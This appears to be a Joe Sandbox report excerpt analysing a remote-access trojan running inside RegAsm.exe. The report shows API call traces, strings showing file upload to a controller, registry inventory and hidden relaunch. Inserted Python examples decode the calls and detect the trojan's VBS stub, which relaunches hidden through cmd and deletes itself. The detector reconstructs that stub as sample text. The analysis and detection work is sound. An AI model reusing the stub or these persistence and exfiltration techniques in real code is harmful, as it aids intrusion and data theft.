                                  • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                  • FreeLibrary.KERNEL32(00000000), ref: 00414EF0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                  • String ID: EIA$\ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                  • API String ID: 2490988753-3346362794
                                  • Opcode ID: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                  • Instruction ID: 3d65f6a93fba2a0b2eac8854c7d2b2934d6e6a161d7d6dc9994b6ec54a408268
                                  • Opcode Fuzzy Hash: bff3b13f7ac9eea3f878ccf145141800db562e87b1258dd51974eed62fb821cf
                                  • Instruction Fuzzy Hash: 5E31C4B1905315A7D7209F65CC84DDF76DCAB84754F004A2AF944A3210D738D985CBAE
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$EnvironmentVariable$_wcschr
                                  • String ID:
                                  • API String ID: 3899193279-0
                                  • Opcode ID: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                  • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                  • Opcode Fuzzy Hash: 8496763b0818b5098030034dcc69127a0bf1f152158b2efe3c03734e132739af
                                  • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                  • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                  • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                  • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                  • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                  • Sleep.KERNEL32(00000064), ref: 00412ECF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                  • String ID: /stext "$0TG$0TG$NG$NG
                                  • API String ID: 1223786279-2576077980
                                  • Opcode ID: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                  • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                  • Opcode Fuzzy Hash: 8b5758fc960045b70db6b1621d1f1f5248a15739f774e2f35fdd395e03aad00d
                                  • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                  • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041C786
                                  • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseEnumOpen
                                  • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                  • API String ID: 1332880857-3714951968
                                  • Opcode ID: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                  • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                  • Opcode Fuzzy Hash: f13192da4e66231cc3a913cdaba6528dc2f099d68fe13da123ac92ab36a9ee38
                                  • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
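Every call line in this report has the same shape: an optional "Part of subcall function" prefix, the API name, the module, the stack arguments the plugin captured, and a reference address. Several of the numeric arguments above carry the security-relevant detail only once decoded: SetFileAttributesW with 00000007 is READONLY|HIDDEN|SYSTEM on the copied RegAsm.exe, RegOpenKeyExA with 80000002 and 00020019 is a read-only open of HKEY_LOCAL_MACHINE\...\Uninstall (a software inventory), and the last ShellExecuteW argument is the window-show mode. The Python below is an added example, not part of Joe Sandbox or of the sample: it parses those lines and decodes the constants that matter for triage. The constant tables are assumed from the Windows SDK headers and are not given on the page; the sample input is copied from the routines above.

```python
"""Parse Joe Sandbox 'Name.MODULE(args), ref: addr' call lines and decode
the constant arguments that matter for triage. Added example; not part of
the report or of the analysed sample."""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# One call line: optional "Part of subcall function XXXXXXXX:" prefix, API name,
# module, optional argument list, and the code address the report references.
CALL_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Constant tables assumed from the Windows SDK headers (not given on the page).
FILE_ATTRIBUTES = {0x1: "READONLY", 0x2: "HIDDEN", 0x4: "SYSTEM", 0x80: "NORMAL"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
HIVES = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
KEY_ACCESS = {0x20019: "KEY_READ"}
SHOW_CMD = {0: "SW_HIDE", 1: "SW_SHOWNORMAL"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None
    decoded: dict = field(default_factory=dict)


def _hex(arg: str) -> Optional[int]:
    """Numeric arguments are printed as 8 hex digits; anything else is a string or '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-F]{8}", arg) else None


def _flags(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def parse_call(line: str) -> Optional[ApiCall]:
    m = CALL_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    call = ApiCall(m["api"], m["mod"], args, m["ref"], m["sub"])
    d = call.decoded
    # Only argument positions whose meaning is fixed by the API are decoded.
    if call.api == "SetFileAttributesW" and len(args) >= 2 and _hex(args[1]) is not None:
        d["attributes"] = _flags(_hex(args[1]), FILE_ATTRIBUTES)
    elif call.api == "CreateFileW" and len(args) >= 2 and _hex(args[1]) is not None:
        d["access"] = _flags(_hex(args[1]), GENERIC_ACCESS)
    elif call.api == "RegOpenKeyExA" and len(args) >= 4:
        d["hive"] = HIVES.get(_hex(args[0]), args[0])
        d["subkey"] = args[1]
        d["access"] = KEY_ACCESS.get(_hex(args[3]), args[3])
    elif call.api == "ShellExecuteW" and len(args) >= 6:
        d["verb"] = args[1]
        d["show"] = SHOW_CMD.get(_hex(args[5]), args[5])
    elif call.api == "GetModuleHandleW" and len(args) >= 2:
        # The listing shows more stack slots than GetModuleHandleW takes; in the
        # routines above the second slot is the name the next GetProcAddress resolves.
        d["resolves"] = f"{args[0]}!{args[1]}"
    return call


def parse_listing(text: str) -> List[ApiCall]:
    return [c for c in (parse_call(line) for line in text.splitlines()) if c]


def summarize(calls: List[ApiCall]) -> List[str]:
    """One line per call, with decoded constants where the parser knows them."""
    out = []
    for c in calls:
        extra = ", ".join(f"{k}={v}" for k, v in c.decoded.items())
        prefix = f"[{c.subcall_of}] " if c.subcall_of else ""
        out.append(f"{prefix}{c.module}!{c.api} @ {c.ref}" + (f"  {extra}" if extra else ""))
    return out


# Constructed sample: call lines copied from the routines above in this report.
SAMPLE = r"""
• GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
• GetProcAddress.KERNEL32(00000000), ref: 004072E0
• CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000), ref: 0040CFBF
• SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
• ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
• ExitProcess.KERNEL32 ref: 0040D09D
  • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
• RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
"""

if __name__ == "__main__":
    print("\n".join(summarize(parse_listing(SAMPLE))))
```

The decoder deliberately refuses to guess at positions it does not know (the "?" slots stay as printed), so a decoded value is always one the API's documented parameter order fixes.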
                                  APIs
                                  • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                  • GetCursorPos.USER32(?), ref: 0041D67A
                                  • SetForegroundWindow.USER32(?), ref: 0041D683
                                  • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                  • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                  • ExitProcess.KERNEL32 ref: 0041D6F6
                                  • CreatePopupMenu.USER32 ref: 0041D6FC
                                  • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                  • String ID: Close
                                  • API String ID: 1657328048-3535843008
                                  • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                  • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                  • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                  • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$Info
                                  • String ID:
                                  • API String ID: 2509303402-0
                                  • Opcode ID: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                  • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                  • Opcode Fuzzy Hash: 75151fbced3465edae0101cd141662f582d879f03032417287744dbc83fd132d
                                  • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                  • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                  • __aulldiv.LIBCMT ref: 00408D88
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                  • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                  • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                  • CloseHandle.KERNEL32(00000000), ref: 00409037
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                  • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                  • API String ID: 3086580692-2582957567
                                  • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                  • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                  • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                  • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                  APIs
                                  • Sleep.KERNEL32(00001388), ref: 0040A77B
                                    • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A788), ref: 0040A6E6
                                    • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                    • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                    • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000,?,?,?,0040A788), ref: 0040A729
                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                                  • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                                  • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                                  • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A859
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,00000000,00000000,00000000), ref: 0040A962
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                  • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                  • API String ID: 3795512280-1152054767
                                  • Opcode ID: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                  • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                                  • Opcode Fuzzy Hash: ff793148450d5445b41cee081077762d1b1ae7bc4452be26425da9ad383290d3
                                  • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                                  APIs
                                  • connect.WS2_32(?,?,?), ref: 004048E0
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                  • WSAGetLastError.WS2_32 ref: 00404A21
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                  • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                  • API String ID: 994465650-3229884001
                                  • Opcode ID: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                  • Instruction ID: 8b7d3ad86a52f8452b0ebae4faff6649d271d562dba2871a89d137605d3bb54b
                                  • Opcode Fuzzy Hash: f8a90a434b368baa81854eed5f01dc5ff272a353476d3d54f953a4ddd85b29a4
                                  • Instruction Fuzzy Hash: CE41E8B57506017BC61877BB890B52E7A56AB81308B50017FEA0256AD3FA7D9C108BEF
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0045138A
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                                    • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                                  • _free.LIBCMT ref: 0045137F
                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                  • _free.LIBCMT ref: 004513A1
                                  • _free.LIBCMT ref: 004513B6
                                  • _free.LIBCMT ref: 004513C1
                                  • _free.LIBCMT ref: 004513E3
                                  • _free.LIBCMT ref: 004513F6
                                  • _free.LIBCMT ref: 00451404
                                  • _free.LIBCMT ref: 0045140F
                                  • _free.LIBCMT ref: 00451447
                                  • _free.LIBCMT ref: 0045144E
                                  • _free.LIBCMT ref: 0045146B
                                  • _free.LIBCMT ref: 00451483
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                                  • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                  • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                                  APIs
                                    • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,?,0040D84A), ref: 0041289B
                                    • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF,?,0040D84A), ref: 004128AE
                                    • Part of subcall function 00413733: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 0041374F
                                    • Part of subcall function 00413733: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00413768
                                    • Part of subcall function 00413733: RegCloseKey.ADVAPI32(?), ref: 00413773
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                  • ExitProcess.KERNEL32 ref: 0040D9FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                  • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                  • API String ID: 1913171305-3159800282
                                  • Opcode ID: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                  • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                  • Opcode Fuzzy Hash: f9fb1c58427f12af755a52ca3692b6cbef369107a25d9b00b3b70057595488dd
                                  • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
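The string IDs above are the pieces of a WScript stub: a hidden relaunch of the program through cmd /c (the Run call ends in `""", 0`) followed by the script deleting its own file, written under Temp with a .vbs extension, opened with ShellExecuteW (show mode 0) and followed by ExitProcess. The Python below is an added example, not part of this report and not code from the sample: it checks a script for that relaunch-and-self-delete pair and only reports when both halves are present, since either half alone appears in ordinary administrative scripts. The sample stub is reassembled from the fragments listed above; the line order and the launched path are assumptions.

```python
"""Detect the WScript relaunch-and-self-delete stub whose fragments appear in
the routine above. Added example; not from the report or from the sample."""
import re
from dataclasses import dataclass
from typing import Optional

# Both halves of the stub. Whitespace and case are loosened because VBScript is
# case-insensitive and the fragments on the page are only partial.
RUN_RE = re.compile(
    r'CreateObject\(\s*"WScript\.Shell"\s*\)\s*\.Run\s+"cmd\s*/c\s*""(?P<target>[^"]+)"""\s*,\s*(?P<show>\d+)',
    re.IGNORECASE,
)
SELF_DELETE_RE = re.compile(
    r'CreateObject\(\s*"Scripting\.FileSystemObject"\s*\)\s*\.DeleteFile\s*\(\s*WScript\.ScriptFullName\s*\)',
    re.IGNORECASE,
)


@dataclass
class StubFinding:
    target: str           # program the stub relaunches through cmd /c
    hidden_window: bool   # Run(..., 0) requests no visible window
    self_deletes: bool    # the script removes its own file afterwards


def analyse_vbs(script: str) -> Optional[StubFinding]:
    """Return a finding only when the hidden launch and the self-delete both occur."""
    run = RUN_RE.search(script)
    delete = SELF_DELETE_RE.search(script)
    if not (run and delete):
        return None
    return StubFinding(run["target"], run["show"] == "0", True)


# Constructed sample assembled from the string fragments listed above; the exact
# line order and the launched path are assumptions, not values from the report.
DROPPED_STUB = (
    'CreateObject("WScript.Shell").Run "cmd /c ""C:\\Users\\user\\AppData\\Local\\Temp\\example.exe""", 0\r\n'
    'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'
)
# Constructed negatives: a benign launcher, and a script that only cleans itself up.
BENIGN_SCRIPT = 'Set sh = CreateObject("WScript.Shell")\r\nsh.Run "notepad.exe", 1\r\n'
SELF_DELETE_ONLY = 'CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\r\n'

if __name__ == "__main__":
    for name, text in [("stub", DROPPED_STUB), ("benign", BENIGN_SCRIPT), ("cleanup", SELF_DELETE_ONLY)]:
        print(name, analyse_vbs(text))
```

Run this over .vbs files recovered from a user's Temp directory; the stub deletes itself on success, so a surviving copy usually means the relaunch failed, and the target path it names is the persisted executable to pull.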
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _free
                                  • String ID:
                                  • API String ID: 269201875-0
                                  • Opcode ID: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                  • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                                  • Opcode Fuzzy Hash: eb0df5fda3918316229511e27b327a59e2685e6d7c39cee33e37fcee88581610
                                  • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                                  APIs
                                    • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000,?,00455D04,00000000,0000000C), ref: 00455946
                                  • GetLastError.KERNEL32 ref: 00455D6F
                                  • __dosmaperr.LIBCMT ref: 00455D76
                                  • GetFileType.KERNEL32(00000000), ref: 00455D82
                                  • GetLastError.KERNEL32 ref: 00455D8C
                                  • __dosmaperr.LIBCMT ref: 00455D95
                                  • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                                  • CloseHandle.KERNEL32(?), ref: 00455EFF
                                  • GetLastError.KERNEL32 ref: 00455F31
                                  • __dosmaperr.LIBCMT ref: 00455F38
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                  • String ID: H
                                  • API String ID: 4237864984-2852464175
                                  • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                  • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                                  • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                  • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,tC,0043EA74,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006), ref: 0044AD23
                                  • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AF1A,00000001,00000001,A4E85006,?,?,?), ref: 0044ADA9
                                  • __alloca_probe_16.LIBCMT ref: 0044AE40
                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,A4E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                  • __freea.LIBCMT ref: 0044AEB0
                                    • Part of subcall function 004461B8: HeapAlloc.KERNEL32(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                  • __freea.LIBCMT ref: 0044AEB9
                                  • __freea.LIBCMT ref: 0044AEDE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
                                  • String ID: PkGNG$tC
                                  • API String ID: 2597970681-4196309852
                                  • Opcode ID: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                  • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                  • Opcode Fuzzy Hash: a3cbb47ee8d45342a2f0fb6a002504832f0ae0c467949e665f7c3dc78735deda
                                  • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A
                                  APIs
                                  Strings
                                  Memory Dump Source
